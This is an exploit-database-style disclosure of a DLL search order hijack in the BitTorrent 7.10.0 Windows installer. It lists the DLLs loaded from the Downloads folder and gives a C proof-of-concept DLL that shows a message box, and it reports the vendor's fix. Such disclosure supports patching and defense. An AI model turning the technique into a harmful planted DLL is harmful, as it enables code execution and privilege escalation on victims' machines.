# Exploit Title: Bittorrent 7.10.0 (Build 43581) Installer DLL Search Order Hijack - "WININET.dll", "DNSAPI.dll", others # Date of Discovery: July 21 2017 # Exploit Author: Rithwik Jayasimha # Author Homepage/Contact: https://thel3l.me # Vendor Name: Bittorrent Inc. # Vendor Homepage: https://www.bittorrent.com # Software Link: http://download-new.utorrent.com/endpoint/bittorrent/os/windows/track/stable/ # Affected Versions: <=7.10.0.43581 # Tested on: Windows 10, 8.1 x64 # Category: local # Vulnerability type: Local Privilege Escalation/Code Execution # Description: Bittorrent versions <=7.10.0 Build 43581 automatically search for "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll", "bcrypt.dll" and "PHLPAPI.dll" among others from the installer download location. This allows a malicious attacker to potentially create these files in the directory resulting in them being run on installer execution. (code execution, local privilege escalation) C:\Users\<username>\Downloads\WININET.dll C:\Users\<username>\Downloads\msls31.dll C:\Users\<username>\Downloads\USP10.dll C:\Users\<username>\Downloads\CRYPTSP.dll C:\Users\<username>\Downloads\bcrypt.dll C:\Users\<username>\Downloads\PHLPAPI.dll # Proof Of Concept: 1. Compile, place in vulnerable location and run bittorrent.exe #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "Bittorrent 7.10.0.43581 DLL Hijacking PoC", "DLL Message", MB_OK); return 0; } # Additional Notes, References and links: # Disclosure Timeline: This issue was remedied in BitTorrent 7.10.0 For Windows (build 43917)